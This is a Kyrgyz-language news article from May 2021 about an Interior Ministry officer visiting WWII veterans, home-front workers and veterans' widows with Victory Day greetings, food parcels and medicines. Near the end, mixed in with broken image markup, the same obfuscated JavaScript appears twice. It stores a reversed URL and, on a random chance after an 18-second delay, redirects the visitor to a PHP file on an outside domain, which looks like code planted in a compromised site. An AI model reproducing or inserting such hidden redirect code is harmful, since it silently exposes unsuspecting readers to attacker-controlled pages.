Ички иштер министрлиги Улуу Ата Мекендик согуштун ардагерлерин Жеңиш күнү менен куттуктады
ИИМдин басма сөз кызматынын маалыматы боюнча, Кыргыз Республикасынын Ички иштер министрлиги 9-май -Улуу Жеңиш күнүнө утурлай Улуу Ата Мекендик согуштун ардагерлерин, оруктун эмгекчилерин куттуктап, жагымдуу маанай тартуулашты.
8-май күнү, Улуу Ата Мекендик согуштун катышуучулары Турденакун
Бейшенбаевди, Садыр Мамбетходжаевди, Гульсун Койчуеваны, Александр
Павликовду, Каим Исмаиловду, оруктун эмгекчилери Чоюнбек Сагынбаевди,
Кудайберген Чороевди, Улуу Ата Мекендик согуштун ардагерлеринин
жубайлары Динара Шикированы, Нина Рамашованы, Кокон Сагынбаеваны, Айша
Момунжанованы, Тамила Барсукованы, Дильнара Жумалиеваны, Мисте
Абдыкеримованы куттуктоо үчүн Кыргыз Республикасынын ИИМдин
Финансы-чарба каржылоо башкы башкармалыгынын пенсия бөлүмүнүн начальниги
милициянын подполковниги Лидия Кыдралиева барды.
Лидия Торобековна өлкөнүн баатырларын келе жаткан Жеңиш майрамы менен
куттуктап, алардын жашоо турмушу, ден соолугунун акыбалы жана кандай
жардамдарга муктаж экендиктерин сурады. Ошондой эле, Кыргыз
Республикасынын ички иштер министри милициянын генерал-майору Улан
Ниязбековдун куттуктоо сөзүн айтып, ыраазычылык сөздөрүн
жеткирди. Пенсия бөлүмүнүн начальниги ардагерлерибизге, оруктун
эмгекчилерине бекем ден соолук, узак өмүр, кажыбас кайрат каалап,
азык-түлүк продуктулары салынган баштыктарды, зарыл болгон
даары-дармектерди, жеке коргонуучу каражаттарды тапшырышты.
«Сиздердин эрдигиңиздер эч качан унутулбайт. Ошол мезгилден бери канча
деген жылдар өтпөсүн, сиздердин эмгегиңиздердин арты менен биз ушундай
заманда жашап жатканыбызды эч качан эстен чыгарбайбыз жана жаңы муундун
эсинде түбөлүк сакталат. Бүгүнкү күнү сиздер биз менен бирге жашап
жатканыңыздар өтө маанилүү. Сиздер ар кандай тарыхый китептерде жок
баалуу чындыкты айтып бере аласыздар. Улуу Ата Мекендик согуштун Жеңиш
күнүнүн 76 жылдык мааракесине карата куттуктап кетүүгө уруксаат
этиңиздер. Миллиондогон адамдардын эрдигинин символу болуп калган бул
окуя эч качан унутулбайт»,- деп ардагерлерди куттуктады Лидия
Торобековна.
Ардагерлер, оруктун эмгекчилери жана Улуу Ата Мекендик согуштун
ардагерлеринин жубайлары конокторду жылуу тосуп алышып, аларды унутта
калтырбай, көңүл буруп куттуктап келгендери үчүн ыраазычылыктарын
билдиришти. Дөөлөттүү карылыкта өмүр сүрүп жаткан ардагерлерибиз,
оруктун эмгекчилери согуш учурундагы, андан кийинки мезгилдеги басып
өткөн жолдору жөнүндө кыскача айтып беришти.
Ардагерлерибизди куттуктоо иш-чарасы азыркы кырдаалды эске алуу менен
уюштурулду.
{if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}</script>too.kg/wp-content/uploads/2021/05/19c0c213-ad7c-4815-a0f5-0531364ff731.jpg» alt=»» class=»wp-image-8577″ /></figure>
<figure class=)
{if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}</script>too.kg/wp-content/uploads/2021/05/302ab48b-b537-481a-a92a-8be0655790e8.jpg» alt=»» class=»wp-image-8578″ /></figure>
<figure class=)
10-май, 2021-ж.
/
Жаңыл Дүйшөкеева
/
Коом